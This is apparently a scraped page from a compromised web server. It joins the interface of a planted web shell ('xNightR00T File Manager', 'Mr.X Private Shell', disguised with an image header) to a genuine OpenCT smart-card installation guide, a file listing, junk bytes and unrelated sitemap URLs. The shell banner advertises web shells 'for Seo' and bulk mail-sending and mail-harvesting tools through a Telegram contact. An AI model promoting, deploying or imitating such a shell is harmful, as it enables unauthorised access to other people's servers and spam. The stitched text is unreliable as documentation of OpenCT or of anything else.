xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:html="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
      QuickStart – OpenCT
    </title><style type="text/css">
           @import url(trac.css);
          </style></head><body><div id="content" class="wiki">
      <div class="wikipage searchable">
        
          <h1 id="Aquickinstallationguidetoopenct">A quick installation guide to openct</h1>
<p>
Please read <a class="wiki" href="OperatingSystems.html" shape="rect">OperatingSystems</a> page first for the general concept and problems and then come back here for step by step instructions. Thanks.
</p>
<p>
To install openct, please do as user,
</p>
<pre class="wiki" xml:space="preserve">$ wget http://www.opensc-project.org/files/openct/openct-0.6.16.tar.gz
$ tar xfvz openct-0.6.16.tar.gz
$ cd openct-0.6.16

$ ./configure --prefix=/usr --sysconfdir=/etc
</pre><p>
This will install openct in /usr, but put the config file
into /etc. The configure out put is quite long, with many
tests for software, versions and so on. At the end a summary
is printed, it should look like this:
</p>
<p>
OpenCT has been configured with the following options
</p>
<pre class="wiki" xml:space="preserve">User binaries:       ${exec_prefix}/bin
Configuration files: /etc

Host:                i686-pc-linux-gnu
Compiler:            gcc
Compiler flags:      -Wall -g -O2 
Preprocessor flags:  -I${top_builddir}/src/include -I${top_srcdir}/src/include 
Linker flags:        
Libraries:           -lpthread 

PC/SC support:       yes
Libusb used:         yes
</pre><p>
To use usb tokens and readers, libusb support is highly recommended.
PC/SC support is only useful, if you want to use openct drivers with
applications other than opensc, using the pcsc-lite middleware.
This author does only use openct with opensc and thus would not need
PC/SC support.
</p>
<p>
Please note that OpenCT uses pkg-config to find libusb and pcsc-lite. pkg-config
should be installed, and - if necessary - PKG_CONFIG_PATH environment set to
directories with the *.pc files, like /usr/lib/pkgconfig/. If you cannot install
pkg-config or for some reason you want to use a version of e.g. libusb that has no
pkg-config file, you can work around this problem by setting environment variables,
for example LIBUSB_CFLAGS="-I/path/to/your/libusb/include" and LIBUSB_LIBS="-L/path/to/your/libusb/lib -lusb".
This will also work if your pkg-config files are broken for some reason.
</p>
<pre class="wiki" xml:space="preserve">$ make
$ su root
</pre><p>
and as root
</p>
<pre class="wiki" xml:space="preserve"># make install
</pre><p>
will install all the files. 
</p>
<p>
At system boot, openct needs to create a status file and
start a process for every permanent connected reader.
For this you need to install the init script into /etc/init.d/
and create startup and shutdown symlinks.
</p>
<pre class="wiki" xml:space="preserve"># cp etc/init-script /etc/init.d/openct
# ln -s ../init.d/openct /etc/rc0.d/K50openct
# ln -s ../init.d/openct /etc/rc1.d/S50openct
# ln -s ../init.d/openct /etc/rc2.d/S50openct
# ln -s ../init.d/openct /etc/rc3.d/S50openct
# ln -s ../init.d/openct /etc/rc4.d/S50openct
# ln -s ../init.d/openct /etc/rc5.d/S50openct
# ln -s ../init.d/openct /etc/rc6.d/K20openct
</pre><p>
This init script will create the directory /var/run/openct/
when run. If you want to restrict access to openct, it might
be best to edit the init script. We have put the mkdir command
in the init script, as some distributions use a tmpfs on /var/run/
and thus all files and directories in it vanish after a reboot.
</p>
<p>
Openct also supports hotplugging. If properly configured you can
simply plugin a usb smart card reader and instantly access it,
or remove it. Beware: never remove a smart card reader or usb
crypto dongle while someone is using it. Incomplete transactions
can leave some smart cards confused up to the point of being unusable.
This is rare, but it happends (especially while a card is initialized).
</p>
<p>
Over the time different mechanisms were developed for hotplugging -
how the kernel can get the message "here is a new usb device" to
the user space application that can make good use of it. OpenCT
now suggests to use hald for this, as most distributions prefer this
way and favor it.
</p>
<pre class="wiki" xml:space="preserve"> mkdir -p /usr/share/hal/fdi/information/10freedesktop/
cp etc/openct.fdi /usr/share/hal/fdi/information/10freedesktop/10-usb-openct.fdi
cp openct-policy.fdi /usr/share/hal/fdi/policy/10osvendor/10-usb-openct.fdi 
cp etc/openct.hald /usr/lib/hal/hald-addon-openct # distro dependent
chmod 0755 /usr/lib/hal/hald-addon-openct # needs to be executable
</pre><p>
Note that hald setup does not support readers in pcmcia or pc-card so far.
But for usb it was tested and is working fine.
</p>
<p>
See <a class="wiki" href="OperatingSystems.html" shape="rect">OperatingSystems</a> for more details and information
on other operating systems.
</p>
<p>
Finaly, openct needs a config file to work correctly.
</p>
<pre class="wiki" xml:space="preserve">cp etc/openct.conf /etc/openct.conf
</pre><p>
if you have serial readers (or anything else, not hotplugged),
edit /etc/openct.conf and configure your reader. Here is an
example for a Towitoko reader connected to the first serial
port:
</p>
<pre class="wiki" xml:space="preserve">        reader towitoko {
               driver = towitoko;
               device = serial:/dev/ttyS0;
        };
</pre><p>
Now attach all those serial readers and start openct. Hotplug readers
already attached will be found as well, but you can as well attach them
later.
</p>
<pre class="wiki" xml:space="preserve">/etc/init.d/openct start
</pre><p>
now you can test it as user:
</p>
<pre class="wiki" xml:space="preserve">openct-tool list
  0 Towitoko Chipdrive Micro
  1 Schlumberger E-Gate
</pre><p>
As you can see I have a normal, serial reader (Towitoko Chipdrive Micro)
and one usb token. If I remove the usb token, it will no longer be listed.
If I add a new token, the new one will show up:
</p>
<pre class="wiki" xml:space="preserve">openct-tool list
  0 Towitoko Chipdrive Micro
  1 Aladdin eToken PRO
</pre><p>
I tested this on systems with several usb ports, too. But this "screen shot"
is from a system with only one usb port, my old laptop.
</p>
<p>
If you have a card in the reader, you can get the answer to reset ("ATR"),
which is a byte string containing some parameters, but can be used very
well to identify a card. Default is reader 0, add "-r 1" to use reader 1.
</p>
<pre class="wiki" xml:space="preserve">openct-tool -r 1 atr
Detected Aladdin eToken PRO
Card present, status changed
ATR: 3b e2 00 ff c1 10 31 fe 55 c8 02 9c
</pre><p>
and similar commands. openct is ready.
</p>

        
        
      </div>
    </div><div class="footer"><hr></hr><p><a href="index.html">Back to Index</a></p></div></body></html>

Filemanager

Name Type Size Permission Actions
AuthorsAndCredits.html File 5.99 KB 0644
CryptoIdentity.html File 1.15 KB 0644
DevelopmentPolicy.html File 3.57 KB 0644
FilesTools.html File 3.47 KB 0644
LicenseText.html File 2.7 KB 0644
MailingLists.html File 2.57 KB 0644
OperatingSystems.html File 12.69 KB 0644
OverView.html File 3.37 KB 0644
PageTemplates.html File 1.64 KB 0644
QuickStart.html File 6.79 KB 0644
RemoteAccess.html File 2.49 KB 0644
ResourcesLinks.html File 2.43 KB 0644
SecureSetup.html File 3.22 KB 0644
StartCom.html File 1.38 KB 0644
TroubleShooting.html File 7.8 KB 0644
WritingDrivers.html File 9.78 KB 0644
cardman.html File 3.06 KB 0644
ccid.html File 1.99 KB 0644
egate.html File 1.32 KB 0644
epass3000.html File 928 B 0644
etoken.html File 1.63 KB 0644
eutron.html File 6.4 KB 0644
gempc.html File 979 B 0644
ikey2032.html File 1.59 KB 0644
ikey3000.html File 1.05 KB 0644
index.html File 6.49 KB 0644
kaan.html File 2.27 KB 0644
pertosmart1030.html File 1.07 KB 0644
pertosmart1038.html File 1.2 KB 0644
smartboard.html File 1.35 KB 0644
smph.html File 1.53 KB 0644
towitoko.html File 1.25 KB 0644
trac.css File 16.07 KB 0644
wbeiuu.html File 1.88 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml